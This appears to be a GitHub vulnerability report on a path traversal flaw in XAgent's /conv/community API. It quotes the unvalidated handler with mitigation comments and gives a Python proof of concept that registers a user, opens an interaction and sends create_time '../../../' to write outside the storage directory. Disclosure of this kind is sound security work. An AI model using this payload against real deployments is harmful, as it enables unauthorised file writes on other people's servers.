
Path Traversal in /conv/community api #415

@Arashimu

Description

@Arashimu

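The /conv/community API has a path traversal vulnerability: the handler builds a storage path from the client-supplied `create_time` field without validating it.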

@router.post("/community")
def community(user_id: str = Depends(user_is_available),
              user_name: str = Form(...),
              interaction: str = Form(...),
              raws: str = Form(...),
              files: UploadFile = File(...),
              db: Session = Depends(get_db)):
    """
    Share an interaction to the community (this API runs on x-agent.net).

    `interaction` and `raws` arrive as JSON-encoded form fields and are
    parsed here, so every key read from them below is client-controlled.

    Raises:
        XAgentWebError: if the interaction has already been shared, or if
            no entry in `raws` has status FINISHED.

    NOTE(review): this excerpt ends where `interaction_dir` is built; the
    rest of the handler (what is written under that directory) is not shown.
    """
    # Both values are parsed from request form fields; nothing in this
    # excerpt checks their shape or content.
    interaction = json.loads(interaction)
    raws = json.loads(raws)
    interaction_id = interaction["interaction_id"]
    old_share = InteractionCRUD.get_shared_interaction(
        db=db, interaction_id=interaction_id)

    # If it has already been shared, do not share it again.
    if old_share:
        raise XAgentWebError("interaction is exist!")

    # NOTE(review): `raws` comes from the request, so this gate reflects what
    # the client claims about the interaction, not server-side state.
    contain_finish = False
    for raw in raws:
        if raw["status"] == StatusEnum.FINISHED:
            contain_finish = True
            break
    # If there is no finished node, do not share.
    if not contain_finish:
        raise XAgentWebError("interaction is not finish!")

    # SECURITY: `create_time` and `interaction_id` are both read from the
    # request body and joined into a filesystem path as-is. os.path.join
    # neither normalizes nor confines its result, so `..` segments in either
    # value place `interaction_dir` outside localstorage/interact_records.
    # Mitigation: parse the ten-character prefix as a strict date (presumably
    # YYYY-MM-DD; confirm against the stored format) or take it from the
    # server-side interaction record, restrict `interaction_id` to the
    # server's ID format, and verify that the resolved path is still under
    # the intended base directory before using it.
    interaction_dir = os.path.join(XAgentServerEnv.base_dir,
                                   "localstorage",
                                   "interact_records",
                                   interaction["create_time"][:10],        # attacker-controlled; only truncated, never validated
                                   interaction_id,
                                   "workspace")

Steps to reproduce:

  1. First, create a user:
# Base URL of the reporter's local test instance.
url = 'http://localhost:8090'


# Registration form fields; the values are placeholders chosen by the reporter.
user = {
    "email": "xxxxx@outlook.com",
    "name": "admin",
    "corporation": "xx",
    "position": "xx",
    "industry": "xx"

}

rep = requests.post(url=f'{url}/user/register', data=user)

print(rep.text)

# Response recorded by the reporter (a bare string literal, kept as evidence).
# It already carries a user_id and token with "available": true, so the
# endpoint under test appears reachable by any self-registered account.
# Its create_time is a full "YYYY-MM-DD HH:MM:SS" timestamp.
'''
{"data":{"user_id":"8d10b6d4f3724f7cb684439644a2a4be","email":"xxxxx@outlook.com","name":"admin","token":"2e4f5d9d1e5248acba5dbde93b212811","available":true,"corporation":"xx","position":"xx","industry":"xx","create_time":"2025-05-09 17:32:56","update_time":"2025-05-09 17:32:56","is_beta":false},"success":true,"message":"Register success, we will send a email to you!"}
'''
  2. Create an interaction:
# Credentials copied from the registration response recorded in step 1.
data = {
    "user_id": "8d10b6d4f3724f7cb684439644a2a4be",
    "token": "2e4f5d9d1e5248acba5dbde93b212811"
}
# `url` is the base URL defined in step 1.
req = requests.post(url=f'{url}/conv/init_conv_env', data=data)


print(req.text)

# Response recorded by the reporter; "id" is the interaction ID that the
# next step submits as interaction_id.
'''
{"data":{"id":"cdcdf752dfba4a0eb689a95a94ff57c6","t":"1746783460326"},"success":true,"message":"success"}
'''
  3. Call the /conv/community API:
# interaction_id is the ID returned by init_conv_env. create_time is the
# only abnormal field: a relative-path string where the handler expects a
# timestamp. A handler that parsed it as a date would reject this request.
interaction = {
    "interaction_id": "cdcdf752dfba4a0eb689a95a94ff57c6",
    "create_time": "../../../"
}

# A single client-declared "finished" entry; presumably this matches
# StatusEnum.FINISHED, which the handler checks on request data only.
raws = [
    {
        "status": "finished"
    }
]

# Both JSON documents are sent as form fields, matching the handler's
# Form(...) parameters.
data = {
    "user_id": "8d10b6d4f3724f7cb684439644a2a4be",
    "token": "2e4f5d9d1e5248acba5dbde93b212811",
    "user_name":  "admin",
    "interaction":   json.dumps(interaction),
    "raws": json.dumps(raws)
}



# The upload body is a local file of the reporter's; note that the handle is
# never closed in this snippet.
files = {
    'files': open('./hook.js', 'rb')
}
rep = requests.post(url=f'{url}/conv/community', data=data, files=files)

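Result:
The data should be saved under XAgentServer/localstorage/interact_records, but it is now saved directly under the XAgent repository root: the three `..` segments in `create_time` climb out of the date directory's parent directories, so the directory named after the interaction ID is created outside the storage tree.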

PS C:\AI\Agent\XAgent> ls

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          2025/5/9     16:27                .github
d-----          2025/5/9     16:27                assets
d-----          2025/5/9     17:39                cdcdf752dfba4a0eb689a95a94ff57c6         # [!] here 
d-----          2025/5/9     16:27                dockerfiles
d-----          2025/5/9     16:27                local_workspace
d-----          2025/5/9     17:11                logs
d-----          2025/5/9     16:27                Markdown_Docs
d-----          2025/5/9     17:23                running_records
d-----          2025/5/9     16:27                tests
d-----          2025/5/9     16:27                ToolServer
d-----          2025/5/9     17:11                XAgent
d-----          2025/5/9     16:27                XAgentGen
d-----          2025/5/9     17:11                XAgentServer
d-----          2025/5/9     16:27                XAgentWeb
-a----          2025/5/9     16:27             94 .env
-a----          2025/5/9     16:27            627 .gitignore
-a----          2025/5/9     16:27        1844943 .project_hierarchy.json
-a----          2025/5/9     16:27           1074 build_images.sh
-a----          2025/5/9     16:27           2117 CHANGELOG.md
-a----          2025/5/9     16:27           5377 CODE_OF_CONDUCT.md
-a----          2025/5/9     16:27          12557 command.py
-a----          2025/5/9     16:27           5362 command_input.py
-a----          2025/5/9     16:27           2204 CONTRIBUTING.md
-a----          2025/5/9     16:27           2785 docker-compose.yml
-a----          2025/5/9     16:27          11538 LICENSE
-a----          2025/5/9     16:27          12346 README.md
-a----          2025/5/9     16:27          15824 README_JA.md
-a----          2025/5/9     16:27          10603 README_ZH.md
-a----          2025/5/9     16:27            330 requirements.txt
-a----          2025/5/9     16:27           4213 run.py
-a----          2025/5/9     16:27            197 setup.py
-a----          2025/5/9     16:27            425 start_server.py
